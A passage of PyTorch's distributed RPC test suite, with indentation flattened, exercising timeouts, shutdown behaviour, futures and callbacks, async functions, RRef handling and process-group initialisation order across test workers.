expected.update(rref_info)
expected.update(agent_info)
expected.update(autograd_info)
# NB: Key ordering is only preserved in python 3.6+. So here, we
# manually check keys are equal.
for key in expected.keys():
self.assertIn(key, info.keys())
for key in info.keys():
self.assertIn(key, expected.keys())
@dist_init(setup_rpc=False)
@sandcastle_skip_if(
IS_MACOS,
"Test is flaky on MacOS since libuv error handling is not as robust as TCP",
)
def test_handle_send_exceptions(self):
# test that if a callee node has gone down, we raise an appropriate
# exception instead of just crashing.
rpc.init_rpc(
name="worker%d" % self.rank,
backend=self.rpc_backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=self.rpc_backend_options,
)
rpc._set_rpc_timeout(10)
# This barrier is needed to ensure that some workers do not exit before
# others have been brought up.
initialize_pg(self.file_init_method, self.rank, self.world_size)
dist.barrier()
if self.rank == 1:
dst_rank = (self.rank + 1) % self.world_size
dst_worker = worker_name(dst_rank)
# allow destination worker to exit without joining
error_str = self.get_shutdown_error_regex()
wait_until_node_failure(dst_rank, error_str)
fut = rpc.rpc_async(dst_worker, torch.add, args=(torch.ones(1), 3))
# Shutdown sequence is not very well defined and as a result
# we can see any of the error messages defined in get_shutdown_error_regex.
with self.assertRaisesRegex(RuntimeError, error_str):
fut.wait()
# exit all workers non-gracefully.
rpc.shutdown(graceful=False)
@dist_init
def test_deadlock(self):
# this test is copied from https://github.com/pytorch/pytorch/issues/45089
if self.rank == 1:
dst1 = worker_name((self.rank + 1) % self.world_size)
x = torch.ones(2)
y = torch.ones(2)
rpc.rpc_async(dst1, RpcTest._slow_add, args=(x, y), timeout=15).wait()
dist_initialized = dist.is_initialized()
if not dist_initialized:
dist.init_process_group(
backend="gloo",
init_method=self.file_init_method,
rank=self.rank,
world_size=self.world_size,
)
@dist_init(setup_rpc=False)
def test_local_shutdown_with_rpc(self):
# test that we can start RPC, send RPCs, and then run local shutdown.
rpc.init_rpc(
name="worker%d" % self.rank,
backend=self.rpc_backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=self.rpc_backend_options,
)
n = self.rank + 1
dst_rank = n % self.world_size
rpc.rpc_sync(
worker_name(dst_rank),
torch.add,
args=(torch.ones(n, n), torch.ones(n, n)),
)
# A barrier is needed to ensure that all RPCs are processed.
# Otherwise, some RPCs can timeout since the receiving end
# has terminated.
initialize_pg(self.file_init_method, self.rank, self.world_size)
dist.barrier()
# pass in graceful=False to ensure that we don't wait for other workers.
rpc.shutdown(graceful=False)
@dist_init(setup_rpc=False)
def test_set_and_get_default_rpc_timeout(self):
timeout = 0.5
# A new `RpcBackendOptions` is constructed
# when accessing `self.rpc_backend_options`.
rpc_backend_options = self.rpc_backend_options
rpc_backend_options.rpc_timeout = timeout
rpc.init_rpc(
name=worker_name(self.rank),
backend=self.rpc_backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=rpc_backend_options,
)
set_timeout = rpc.get_rpc_timeout()
self.assertEqual(timeout, set_timeout)
rpc.shutdown()
@dist_init
def test_default_timeout_used(self):
"""
Tests that if no timeout is passed into rpc_async and rpc_sync, then the
default timeout is used.
"""
dst_rank = (self.rank + 1) % self.world_size
rpc._set_rpc_timeout(0.001) # 1 ms
# futures should time out and be marked with an exception indicating it as such.
futs = [
rpc.rpc_async(worker_name(dst_rank), my_sleep_func, args=())
for _ in range(10)
]
expected_error = self.get_timeout_error_regex()
for fut in futs:
with self.assertRaisesRegex(RuntimeError, expected_error):
fut.wait()
# ensure that if a new timeout is set old futures don't time out but new ones do.
rpc._set_rpc_timeout(200) # 200 seconds
# create a longstanding RPC.
fut1 = rpc.rpc_async(worker_name(dst_rank), my_sleep_func, args=(1,))
# now, set a short timeout.
rpc._set_rpc_timeout(0.001)
# fut2 should time out, fut1 should not.
fut2 = rpc.rpc_async(worker_name(dst_rank), my_sleep_func, args=(1,))
with self.assertRaisesRegex(RuntimeError, expected_error):
fut2.wait()
fut1.wait()
# Zero timeout means infinity, so future should run to completion.
rpc._set_rpc_timeout(0)
rpc.rpc_async(worker_name(dst_rank), my_sleep_func, args=()).wait()
# reset to default timeout so shutdown messages can process cleanly.
rpc._set_rpc_timeout(rpc.constants.DEFAULT_RPC_TIMEOUT_SEC)
@dist_init
def test_rpc_timeouts(self):
# TODO: enable timeouts for rpc.remote/RRef (https://github.com/pytorch/pytorch/issues/33803)
dst_rank = (self.rank + 1) % self.world_size
dst_worker = worker_name(dst_rank)
timeout = 0.1 # 100 ms
expected_error = self.get_timeout_error_regex()
# Test async UDF
fut = rpc.rpc_async(dst_worker, my_sleep_func, args=(1,), timeout=timeout)
with self.assertRaisesRegex(RuntimeError, expected_error):
fut.wait()
# Ensure run to completion if there is no timeout and we use the default
# RPC timeout.
rpc.rpc_async(dst_worker, my_sleep_func, args=(1,)).wait()
# Test sync UDF
with self.assertRaisesRegex(RuntimeError, expected_error):
rpc.rpc_sync(dst_worker, my_sleep_func, args=(1,), timeout=timeout)
# Ensure run to completion if there is no timeout and we use the default
# RPC timeout.
rpc.rpc_sync(dst_worker, my_sleep_func, args=(1,))
# If we set a default timeout for RPCs, it should be respected, though
# still overridden if we pass in a different timeout to the APIs.
rpc._set_rpc_timeout(0.001)
fut = rpc.rpc_async(dst_worker, my_sleep_func, args=(1,))
with self.assertRaisesRegex(RuntimeError, expected_error):
fut.wait()
with self.assertRaisesRegex(RuntimeError, expected_error):
rpc.rpc_sync(dst_worker, my_sleep_func, args=(1,))
# The RPCs should run to completion since we override the timeout.
rpc.rpc_async(dst_worker, my_sleep_func, args=(1,), timeout=5).wait()
rpc.rpc_sync(dst_worker, my_sleep_func, args=(1,), timeout=5)
# Passing in a zero timeout should ensure that the RPC won't time out.
rpc.rpc_async(dst_worker, my_sleep_func, args=(1,), timeout=0).wait()
rpc.rpc_sync(dst_worker, my_sleep_func, args=(1,), timeout=0)
# Reset for clean shutdown
rpc._set_rpc_timeout(rpc.constants.DEFAULT_RPC_TIMEOUT_SEC)
def test_dist_init_decorator(self):
@dist_init(setup_rpc=False)
def test_func(self):
return "expected result"
self.assertEqual(test_func(self), "expected result")
@dist_init
def test_func(self):
return "expected result"
self.assertEqual(test_func(self), "expected result")
def test_use_rpc_pickler(self):
class TestPickler:
pass
test_pickler = TestPickler()
with _use_rpc_pickler(test_pickler):
self.assertTrue(torch.distributed.rpc.api._default_pickler is test_pickler)
self.assertTrue(
torch.distributed.rpc.api._default_pickler is _internal_rpc_pickler
)
@dist_init
def test_wait_all(self):
with _wait_all():
self.assertTrue(_thread_local_var.future_list == [])
dst = worker_name((self.rank + 1) % self.world_size)
fut = rpc.rpc_async(dst, torch.add, (torch.ones(2, 2), 1))
self.assertTrue(len(_thread_local_var.future_list) == 1)
self.assertTrue(isinstance(_thread_local_var.future_list[0], torch._C.Future))
self.assertTrue(fut.done())
self.assertEqual(fut.wait(), torch.ones(2, 2) + 1)
self.assertFalse(hasattr(_thread_local_var, "future_list"))
@dist_init
def test_wait_all_multiple_call(self):
with _wait_all():
self.assertTrue(_thread_local_var.future_list == [])
dst = worker_name((self.rank + 1) % self.world_size)
for i in range(20):
fut = rpc.rpc_async(dst, torch.add, (torch.ones(i, i), 1))
res = rpc.rpc_sync(dst, torch.add, (torch.ones(i, i), 1))
self.assertEqual(res, torch.ones(i, i) + 1)
self.assertEqual(fut.wait(), torch.ones(i, i) + 1)
self.assertTrue(len(_thread_local_var.future_list) == 20)
self.assertFalse(hasattr(_thread_local_var, "future_list"))
@dist_init
def test_wait_all_timeout(self):
expected_error = self.get_timeout_error_regex()
with self.assertRaisesRegex(RuntimeError, expected_error):
with _wait_all():
self.assertTrue(_thread_local_var.future_list == [])
dst = worker_name((self.rank + 1) % self.world_size)
timeout = 0.1 # 100 ms
fut = rpc.rpc_async(dst, my_sleep_func, args=(1,), timeout=timeout)
self.assertFalse(hasattr(_thread_local_var, "future_list"))
@dist_init
def test_wait_all_raise_in_user_func(self):
with self.assertRaises(ValueError):
with _wait_all():
self.assertTrue(_thread_local_var.future_list == [])
dst = worker_name((self.rank + 1) % self.world_size)
fut = rpc.rpc_async(dst, raise_func)
self.assertFalse(hasattr(_thread_local_var, "future_list"))
@dist_init
def test_wait_all_raise_in_body(self):
with self.assertRaises(ValueError):
with _wait_all():
raise_func()
self.assertFalse(hasattr(_thread_local_var, "future_list"))
timed_out_rpc_event = None
@staticmethod
def timed_out_rpc():
RpcTest.timed_out_rpc_event.wait()
@dist_init
def test_wait_all_exit_early_python(self):
# Initialize the event in the subprocess.
RpcTest.timed_out_rpc_event = Event()
# Wait for all processes to initialize event.
initialize_pg(self.file_init_method, self.rank, self.world_size)
dist.barrier()
dst = worker_name((self.rank + 1) % self.world_size)
fut1 = rpc.rpc_async(dst, RpcTest.timed_out_rpc)
fut2 = rpc.rpc_async(dst, raise_func)
fut3 = rpc.rpc_async(dst, raise_func)
# We should receive the error from fut2
with self.assertRaisesRegex(ValueError, expected_err):
torch.futures.wait_all([fut1, fut2, fut3])
# Unblock RPC thread for fut1
RpcTest.timed_out_rpc_event.set()
@dist_init
def test_wait_all_exit_early_builtin(self):
# Initialize the event in the subprocess.
RpcTest.timed_out_rpc_event = Event()
# Wait for all processes to initialize event.
initialize_pg(self.file_init_method, self.rank, self.world_size)
dist.barrier()
dst = worker_name((self.rank + 1) % self.world_size)
fut1 = rpc.rpc_async(dst, RpcTest.timed_out_rpc)
fut2 = rpc.rpc_async(dst, torch.add, args=(torch.rand(10), torch.rand(5)))
fut3 = rpc.rpc_async(dst, torch.add, args=(torch.rand(10), torch.rand(5)))
# We should receive the error from fut2
with self.assertRaisesRegex(RuntimeError, "size of tensor"):
torch.futures.wait_all([fut1, fut2, fut3])
# Unblock RPC thread for fut1
RpcTest.timed_out_rpc_event.set()
@dist_init
def test_wait_all_exit_early_script_function(self):
# Initialize the event in the subprocess.
RpcTest.timed_out_rpc_event = Event()
# Wait for all processes to initialize event.
initialize_pg(self.file_init_method, self.rank, self.world_size)
dist.barrier()
dst = worker_name((self.rank + 1) % self.world_size)
fut1 = rpc.rpc_async(dst, RpcTest.timed_out_rpc)
fut2 = rpc.rpc_async(dst, raise_func_script, args=(expected_err,))
fut3 = rpc.rpc_async(dst, raise_func_script, args=(expected_err,))
# We should receive the error from fut2
with self.assertRaisesRegex(RuntimeError, expected_err):
torch.futures.wait_all([fut1, fut2, fut3])
# Unblock RPC thread for fut1
RpcTest.timed_out_rpc_event.set()
@dist_init
def test_function_not_on_callee(self):
# test that if a function does not exist on a callee, we don't crash,
# instead we get an AttributeError indicating that the func does not exist.
this_module = sys.modules[__name__]
caller_worker = "worker0"
callee_worker = "worker1"
if self.rank == 1:
# Use delattr to remove the binding of a func on this nodes
delattr(this_module, "foo_add")
# notify remote end that we have removed it.
rpc.rpc_sync(caller_worker, set_value, args=(self.rank,))
if self.rank == 0:
# func exists on caller, but not callee.
# wait for remote end to remove the binding of foo_add func.
wait_for_value_future()
# Ensure that we have the attribute on this module. Otherwise, the test could fail due to a caller-side pickling error.
self.assertTrue(hasattr(this_module, "foo_add"))
with self.assertRaisesRegex(
RuntimeError, "RPC pickler does not serialize"
):
rpc.rpc_sync(callee_worker, foo_add, args=())
@dist_init
def test_non_garbage_collected_user_rref_due_to_local_circular_dependency(self):
dst_worker_name = worker_name((self.rank + 1) % self.world_size)
a = MyClass(1)
b = MyClass(2)
# This is to make Python not garbage collect a and b.
a.other = b
b.other = a
n = self.rank
a.rref = rpc.remote(
dst_worker_name,
torch.add,
args=(torch.ones(n, n), 2)
)
@dist_init(setup_rpc=False)
def test_use_rref_after_shutdown(self):
rpc.init_rpc(
name="worker%d" % self.rank,
backend=self.rpc_backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=self.rpc_backend_options,
)
n = self.rank + 1
dst_rank = n % self.world_size
rref = rpc.remote(
worker_name(dst_rank),
torch.add,
args=(torch.ones(n, n), torch.ones(n, n)),
)
# pass in graceful=True to ensure that local UserRRefs are deleted.
rpc.shutdown(graceful=True)
with self.assertRaisesRegex(
RuntimeError, "Cannot call to_here\\(\\) on it after deletion."
):
rref.to_here()
with self.assertRaisesRegex(
RuntimeError, "Cannot call fork an UserRRef after deletion."
):
import torch.distributed.rpc.internal as internal
internal.serialize(rref)
@staticmethod
def _return_gpu_tensor():
return torch.rand(3, 3).cuda(0)
@staticmethod
def _return_gpu_tensor_list():
return [torch.rand(3, 3).cuda(0), torch.rand(3, 3).cuda(1)]
@staticmethod
def _gpu_tensor_list_arg(tensor_list):
return torch.rand(3, 3)
def _create_rref(self):
owner_rank = (self.rank + 2) % self.world_size
return rpc.remote(
worker_name(owner_rank),
torch.add,
args=(torch.zeros(2, 2), 1)
)
@dist_init
def test_user_rrefs_confirmed(self):
dst_rank = (self.rank + 1) % self.world_size
rref = self._create_rref()
ret = rpc.rpc_sync(
worker_name(dst_rank),
check_rref_confirmed,
args=(rref,)
)
self.assertEqual(ret, True)
@dist_init
def test_user_rrefs_confirmed_remote(self):
dst_rank = (self.rank + 1) % self.world_size
rref = self._create_rref()
ret_rref = rpc.remote(
worker_name(dst_rank),
check_rref_confirmed,
args=(rref,)
)
self.assertEqual(ret_rref.to_here(), True)
@dist_init
def test_rref_py_pickle_not_supported(self):
local_rref = RRef(35)
with TemporaryFileName() as fname:
with self.assertRaisesRegex(RuntimeError, "Can not pickle rref in python pickler"):
torch.save(local_rref, fname)
@dist_init
def test_remote_throw(self):
rref = rpc.remote(worker_name((self.rank + 1) % self.world_size),
raise_or_inc,
args=(torch.ones(2),))
with self.assertRaisesRegex(Exception, ".*Expected error.*"):
rref.to_here()
@dist_init
def test_non_cont_tensors(self):
if self.rank == 0:
# Create a non-contiguous tensor.
t = torch.rand(5, 5)
t_view = t.narrow(1, 2, 2)
self.assertFalse(t_view.is_contiguous())
t_cont = t_view.contiguous()
self.assertTrue(t_cont.is_contiguous())
self.assertEqual(t_view, t_cont)
# Send non-cont tensor over RPC.
next_rank = (self.rank + 1) % self.world_size
t_ret = rpc.rpc_sync(worker_name(next_rank), non_cont_test, args=(t_view, t_cont))
# Verify the returned tensor.
self.assertEqual(t_view, t_ret)
self.assertFalse(t_ret.is_contiguous())
@dist_init
def test_callback_simple(self):
set_by_cb = concurrent.futures.Future()
n = self.rank + 1
def callback(fut):
ret = fut.wait()
self.assertEqual(ret, torch.ones(n, n) * 2)
set_by_cb.set_result(ret.clone() + 1)
fut = rpc.rpc_async(
worker_name(n % self.world_size),
torch.add,
args=(torch.ones(n, n), torch.ones(n, n))
)
fut.then(callback)
self.assertEqual(fut.wait(), torch.ones(n, n) * 2)
self.assertEqual(set_by_cb.result(), torch.ones(n, n) * 2 + 1)
self.assertEqual(fut.wait(), torch.ones(n, n) * 2)
@dist_init
def test_callback_wrong_arg_num(self):
set_by_cb = concurrent.futures.Future()
n = self.rank + 1
fut = rpc.rpc_async(
worker_name(n % self.world_size),
torch.add,
args=(torch.ones(n, n), torch.ones(n, n))
)
cb_fut = fut.then(my_function)
self.assertEqual(fut.wait(), torch.ones(n, n) * 2)
with self.assertRaisesRegex(
RuntimeError,
"my\\_function\\(\\) missing 2 required positional arguments"
):
cb_fut.wait()
@dist_init
def test_callback_wrong_arg_type(self):
dst = worker_name((self.rank + 1) % self.world_size)
fut0 = rpc.rpc_async(dst, torch.add, args=(torch.ones(2, 2), 1))
fut1 = fut0.then(lambda x: x + 1)
with self.assertRaisesRegex(
RuntimeError,
"unsupported operand type\\(s\\) for \\+"
):
fut1.wait()
@dist_init
def test_callback_multi(self):
num_cbs = 10
n = self.rank + 1
def callback(idx, fut):
ret = fut.wait()
self.assertEqual(ret, torch.ones(n, n) * 2)
return ret + idx
fut = rpc.rpc_async(
worker_name(n % self.world_size),
torch.add,
args=(torch.ones(n, n), torch.ones(n, n))
)
cb_futs = []
for idx in range(num_cbs):
cb_futs.append(fut.then(partial(callback, idx)))
self.assertEqual(fut.wait(), torch.ones(n, n) * 2)
for idx in range(num_cbs):
self.assertEqual(
cb_futs[idx].wait(),
torch.ones(n, n) * 2 + idx
)
self.assertEqual(fut.wait(), torch.ones(n, n) * 2)
@dist_init
def test_callback_chain(self):
n = self.rank + 1
dst = worker_name(n % self.world_size)
def callback(fut):
return fut.wait() + 1
fut = rpc.rpc_async(
worker_name(n % self.world_size),
torch.add,
args=(torch.ones(n, n), 1)
)
num_cbs = 20
for _ in range(num_cbs):
fut = fut.then(callback)
self.assertEqual(fut.wait(), torch.ones(n, n) + 1 + num_cbs)
@dist_init
def test_callback_in_rpc(self):
dst1 = worker_name((self.rank + 1) % self.world_size)
dst2 = worker_name((self.rank + 2) % self.world_size)
ret = rpc.rpc_sync(
dst1,
add_use_future_cb,
args=(dst2, torch.ones(2, 2), 1, 2)
)
self.assertEqual(ret, torch.ones(2, 2) + 1 + 2)
@dist_init
def test_callback_with_ret(self):
dst = worker_name((self.rank + 1) % self.world_size)
def callback(fut0):
fut2 = rpc.rpc_async(
dst,
torch.add,
args=(fut0.wait(), 1)
).then(lambda fut1: fut1.wait() + 1)
return fut2.wait()
fut3 = rpc.rpc_async(
dst,
torch.add,
args=(torch.ones(2, 2), 1)
).then(callback)
self.assertEqual(fut3.wait(), torch.ones(2, 2) + 3)
@dist_init
def test_callback_with_error(self):
dst = worker_name((self.rank + 1) % self.world_size)
def callback(fut0):
with self.assertRaisesRegex(ValueError, "Expected error"):
fut0.wait()
raise RuntimeError("Another expected error")
fut1 = rpc.rpc_async(dst, raise_func).then(callback)
with self.assertRaisesRegex(RuntimeError, "Another expected error"):
fut1.wait()
@dist_init
def test_callback_none(self):
dst = worker_name((self.rank + 1) % self.world_size)
with self.assertRaisesRegex(
TypeError,
"incompatible function arguments."
):
rpc.rpc_async(dst, raise_func).then(None)
@dist_init
def test_add_done_callback(self):
set_by_cb = False
n = self.rank + 1
def callback(fut):
nonlocal set_by_cb
fut.wait()
set_by_cb = True
fut = rpc.rpc_async(
worker_name(n % self.world_size),
torch.add,
args=(torch.ones(n, n), torch.ones(n, n))
)
fut.add_done_callback(callback)
fut_then = fut.then(lambda _: True)
self.assertEqual(fut.wait(), torch.ones(n, n) * 2)
# We have no guarantee that the add_done_callback fn will execute before the test finishes.
# Adding a 'then' callback that runs afterwards to guarantee we wait for the first callback
fut_then.wait()
self.assertTrue(set_by_cb)
self.assertEqual(fut.wait(), torch.ones(n, n) * 2)
@dist_init
def test_mark_future_twice(self):
fut = rpc.rpc_async(
worker_name((self.rank + 1) % self.world_size),
torch.add,
args=(torch.zeros(2, 2), 1)
)
self.assertEqual(fut.wait(), torch.zeros(2, 2) + 1)
with self.assertRaisesRegex(
RuntimeError,
"Future can only be marked completed once"
):
fut.set_result(1)
@dist_init
def test_pickle_future(self):
fut = torch.futures.Future()
errMsg = "Can not pickle torch.futures.Future"
dst = worker_name((self.rank + 1) % self.world_size)
with TemporaryFileName() as fname:
with self.assertRaisesRegex(RuntimeError, errMsg):
rpc.rpc_sync(dst, fail_on_fut, args=(fut,))
with TemporaryFileName() as fname:
with self.assertRaisesRegex(RuntimeError, errMsg):
rpc.rpc_async(dst, fail_on_fut, args=(fut,))
with TemporaryFileName() as fname:
with self.assertRaisesRegex(RuntimeError, errMsg):
rpc.remote(dst, fail_on_fut, args=(fut,))
@dist_init
def test_future_done(self):
dst = worker_name((self.rank + 1) % self.world_size)
fut = rpc.rpc_async(dst, torch.add, args=(torch.zeros(2), 1))
fut.wait()
self.assertTrue(fut.done())
@dist_init
def test_future_done_exception(self):
dst = worker_name((self.rank + 1) % self.world_size)
fut = rpc.rpc_async(dst, raise_func)
with self.assertRaisesRegex(ValueError, "Expected error"):
fut.wait()
self.assertTrue(fut.done())
def _test_future_cb(self, func):
dst1 = worker_name((self.rank + 1) % self.world_size)
dst2 = worker_name((self.rank + 2) % self.world_size)
ret = rpc.rpc_sync(
dst1,
func,
args=(dst2, torch.ones(2, 2), 1, 2)
)
self.assertEqual(ret, torch.ones(2, 2) + 1 + 2)
@dist_init
def test_future_in_rpc(self):
self._test_future_cb(add_use_future_set_result)
@dist_init
def test_future_nested_callback(self):
self._test_future_cb(add_use_future_nested_cb)
def _run_func_in_mode(self, to, fn, mode, args=None, kwargs=None):
if mode == RPCExecMode.SYNC:
return rpc.rpc_sync(to, fn, args=args, kwargs=kwargs)
elif mode == RPCExecMode.ASYNC:
return rpc.rpc_async(to, fn, args=args, kwargs=kwargs).wait()
elif mode == RPCExecMode.REMOTE:
return rpc.remote(to, fn, args=args, kwargs=kwargs).to_here()
def _test_async_function_raise(self, mode):
with self.assertRaisesRegex(RuntimeError, "Expected error"):
self._run_func_in_mode(
worker_name((self.rank + 1) % self.world_size),
async_raise_func,
mode
)
@dist_init
def test_async_function_raise(self):
self._test_async_function_raise(RPCExecMode.SYNC)
@dist_init
def test_async_function_raise_async(self):
self._test_async_function_raise(RPCExecMode.ASYNC)
@dist_init
def test_async_function_raise_remote(self):
self._test_async_function_raise(RPCExecMode.REMOTE)
def _test_async_function_wrong_return_type(self, mode):
errMsg = (
"Functions decorated with @rpc\\.async_function must return a "
"torch\\.futures\\.Future object,"
)
with self.assertRaisesRegex(RuntimeError, errMsg):
self._run_func_in_mode(
worker_name((self.rank + 1) % self.world_size),
async_wrong_type,
mode
)
@dist_init
def test_async_function_wrong_return_type(self):
self._test_async_function_wrong_return_type(RPCExecMode.SYNC)
@dist_init
def test_async_function_wrong_return_type_async(self):
self._test_async_function_wrong_return_type(RPCExecMode.ASYNC)
@dist_init
def test_async_function_wrong_return_type_remote(self):
self._test_async_function_wrong_return_type(RPCExecMode.REMOTE)
@dist_init
def test_async_function_simple(self):
dst1 = worker_name((self.rank + 1) % self.world_size)
dst2 = worker_name((self.rank + 2) % self.world_size)
ret = rpc.rpc_sync(dst1, async_add, args=(dst2, torch.ones(2, 2), 1))
self.assertEqual(ret, torch.ones(2, 2) + 1)
def _test_async_function(self, fn, mode=RPCExecMode.SYNC):
dst1 = worker_name((self.rank + 1) % self.world_size)
dst2 = worker_name((self.rank + 2) % self.world_size)
args = (dst2, torch.ones(2, 2), 1, 2)
ret = self._run_func_in_mode(dst1, fn, mode, args=args)
self.assertEqual(ret, torch.ones(2, 2) + 3)
@dist_init
def test_async_function_with_future_ctor(self):
self._test_async_function(async_add_with_future_ctor)
@dist_init
def test_async_function_with_future_ctor_remote(self):
self._test_async_function(
async_add_with_future_ctor,
RPCExecMode.REMOTE
)
@dist_init
def test_async_function_chained(self):
self._test_async_function(async_add_chained)
@dist_init
def test_async_function_chained_remote(self):
self._test_async_function(async_add_chained, RPCExecMode.REMOTE)
@dist_init
def test_async_function_nested(self):
self._test_async_function(async_add_nested)
@dist_init
def test_async_function_nested_remote(self):
self._test_async_function(async_add_nested, RPCExecMode.REMOTE)
@dist_init
def test_async_static_method(self):
self._test_async_function(AsyncExecutionClass.static_async_add)
@dist_init
def test_async_static_method_remote(self):
self._test_async_function(
AsyncExecutionClass.static_async_add,
RPCExecMode.REMOTE
)
@dist_init
def test_async_class_method(self):
self._test_async_function(AsyncExecutionClass.class_async_add)
@dist_init
def test_async_class_method_remote(self):
self._test_async_function(
AsyncExecutionClass.class_async_add,
RPCExecMode.REMOTE
)
def _test_test_async_class_rref_proxy(self, mode=RPCExecMode.SYNC):
dst1 = worker_name((self.rank + 1) % self.world_size)
dst2 = worker_name((self.rank + 2) % self.world_size)
rref = rpc.remote(dst1, AsyncExecutionClass)
x = torch.ones(2, 2)
y = torch.ones(2, 2) + 1
if mode == RPCExecMode.SYNC:
ret = rref.rpc_sync().static_async_add(dst2, x, x, y)
ret += rref.rpc_sync().class_async_add(dst2, x, x, y)
ret += rref.rpc_sync().bound_async_add(dst2, x, x, y)
elif mode == RPCExecMode.ASYNC:
ret = rref.rpc_async().static_async_add(dst2, x, x, y).wait()
ret += rref.rpc_async().class_async_add(dst2, x, x, y).wait()
ret += rref.rpc_async().bound_async_add(dst2, x, x, y).wait()
elif mode == RPCExecMode.REMOTE:
ret = rref.remote().static_async_add(dst2, x, x, y).to_here()
ret += rref.remote().class_async_add(dst2, x, x, y).to_here()
ret += rref.remote().bound_async_add(dst2, x, x, y).to_here()
self.assertEqual(ret, 3 * 4 * x)
@dist_init
def test_async_class_rref_proxy(self):
self._test_test_async_class_rref_proxy()
@dist_init
def test_async_class_rref_proxy_async(self):
self._test_test_async_class_rref_proxy(mode=RPCExecMode.ASYNC)
@dist_init
def test_async_class_rref_proxy_remote(self):
self._test_test_async_class_rref_proxy(mode=RPCExecMode.REMOTE)
def _test_async_function_multi(self, fn, mode=RPCExecMode.SYNC):
dst1 = worker_name((self.rank + 1) % self.world_size)
dst2 = worker_name((self.rank + 2) % self.world_size)
num = 20
step = 3
args = (dst2, torch.ones(2, 2), num, step)
ret = self._run_func_in_mode(dst1, fn, mode, args=args)
self.assertEqual(ret, torch.ones(2, 2) + num * step)
@dist_init
def test_async_function_multi_chained(self):
self._test_async_function_multi(async_add_chained_multi)
@dist_init
def test_async_function_multi_chained_async(self):
self._test_async_function_multi(
async_add_chained_multi,
RPCExecMode.ASYNC
)
@dist_init
def test_async_function_multi_chained_remote(self):
self._test_async_function_multi(
async_add_chained_multi,
RPCExecMode.REMOTE
)
@dist_init
def test_async_function_multi_fanout(self):
self._test_async_function_multi(async_add_multi_fanout)
@dist_init
def test_async_function_multi_fanout_async(self):
self._test_async_function_multi(
async_add_multi_fanout,
RPCExecMode.ASYNC
)
@dist_init
def test_async_function_multi_fanout_remote(self):
self._test_async_function_multi(
async_add_multi_fanout,
RPCExecMode.REMOTE
)
def _test_return_future(self, mode):
with self.assertRaisesRegex(
RuntimeError,
"Can not pickle torch.futures.Future"
):
self._run_func_in_mode(
worker_name((self.rank + 1) % self.world_size),
return_future,
mode
)
@dist_init
def test_return_future(self):
self._test_return_future(RPCExecMode.SYNC)
@dist_init
def test_return_future_async(self):
self._test_return_future(RPCExecMode.ASYNC)
@dist_init
def test_return_future_remote(self):
self._test_return_future(RPCExecMode.REMOTE)
@dist_init
def test_rref_timeout(self):
# This test is similar to ones in FaultyProcessGroupTest, but is meant to be
# run with other backends besides ProcessGroup.
if self.rank != 0:
return
dst_rank = (self.rank + 1) % self.world_size
dst_worker = "worker{}".format(dst_rank)
# 10 ms timeout
rref = rpc.remote(dst_worker, my_sleep_func, args=(2, ), timeout=0.01)
# Future corresponding to the remote creation should time out.
expected_error = self.get_timeout_error_regex()
with self.assertRaisesRegex(RuntimeError, expected_error):
rref._get_future().wait()
# Call to ensure pending callbacks are run.
wait_until_pending_futures_and_users_flushed()
with self.assertRaisesRegex(RuntimeError, "RRef creation"):
rref.to_here()
wait_until_owners_and_forks_on_rank(1, 1, rank=1)
@dist_init(setup_rpc=False)
@sandcastle_skip_if(
os.environ.get("RPC_INIT_WITH_TCP", None) == "1",
"init_pg_then_rpc does not work with TCP init, see https://github.com/pytorch/pytorch/issues/41614."
)
def test_init_pg_then_rpc(self):
dist.init_process_group(
backend="gloo",
init_method=self.init_method,
rank=self.rank,
world_size=self.world_size,
)
rpc.init_rpc(
name=worker_name(self.rank),
backend=self.rpc_backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=self.rpc_backend_options,
)
# Test RPC.
next_rank = (self.rank + 1) % self.world_size
ret = rpc.rpc_sync(worker_name(next_rank), torch.add, args=(torch.ones(2, 2), 1))
self.assertEqual(ret, torch.ones(2, 2) + 1)
# Test PG
dist.barrier()
rpc.shutdown()
@dist_init(setup_rpc=False)
@sandcastle_skip_if(
os.environ.get("RPC_INIT_WITH_TCP", None) == "1",
"init_rpc_then_pg does not work with TCP init, see https://github.com/pytorch/pytorch/issues/41614."
)
def test_init_rpc_then_pg(self):
rpc.init_rpc(
name=worker_name(self.rank),
backend=self.rpc_backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=self.rpc_backend_options,
)
dist.init_process_group(
backend="gloo",
init_method=self.init_method,
rank=self.rank,
world_size=self.world_size,
)
# Test RPC.
next_rank = (self.rank + 1) % self.world_size
ret = rpc.rpc_sync(worker_name(next_rank), torch.add, args=(torch.ones(2, 2), 1))
self.assertEqual(ret, torch.ones(2, 2) + 1)
# Test PG
dist.barrier()
rpc.shutdown()
@dist_init
def test_wait_all_with_exception(self):
futs = []
dst = worker_name((self.rank + 1) % self.world_size)
for _ in range(10):
futs.append(rpc.rpc_async(dst, raise_func))
with self.assertRaisesRegex(ValueError, "Expected error"):
ret = torch.futures.wait_all(futs)
@dist_init
def test_wait_all_with_partial_exception(self):
futs = []
dst = worker_name((self.rank + 1) % self.world_size)
for _ in range(10):
futs.append(rpc.rpc_async(dst, torch.add, args=(torch.ones(2), 1)))
futs.append(rpc.rpc_async(dst, raise_func))
with self.assertRaisesRegex(ValueError, "Expected error"):
ret = torch.futures.wait_all(futs)
@dist_init(setup_rpc=False)
@sandcastle_skip_if(
os.environ.get("RPC_INIT_WITH_TCP", None) == "1",
"Test does not work with TCP init, see https://github.com/pytorch/pytorch/issues/46491",
)
def test_init_rpc_twice(self):
initialize_pg(self.file_init_method, self.rank, self.world_size)
rpc.init_rpc(
name=worker_name(self.rank),
backend=self.rpc_backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=self.rpc_backend_options,
)
rpc.shutdown()
# Wait for all init to complete.
dist.barrier()
# Ensure rpc initialization works again.
rpc.init_rpc(
name=worker_name(self.rank),
backend=self.rpc_backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=self.rpc_backend_options,
)
# Verify RPCs work after re-init.
dst = worker_name((self.rank + 1) % self.world_size)
rpc.rpc_sync(dst, torch.add, args=(torch.ones(2, 2), 1))
rpc.rpc_sync(dst, foo_add, args=())
rpc.shutdown()
def test_wrong_types(self):
with self.assertRaisesRegex(
TypeError,
"Argument backend must be a member of BackendType",
):
rpc.init_rpc(
name=worker_name(self.rank),
rank=self.rank,
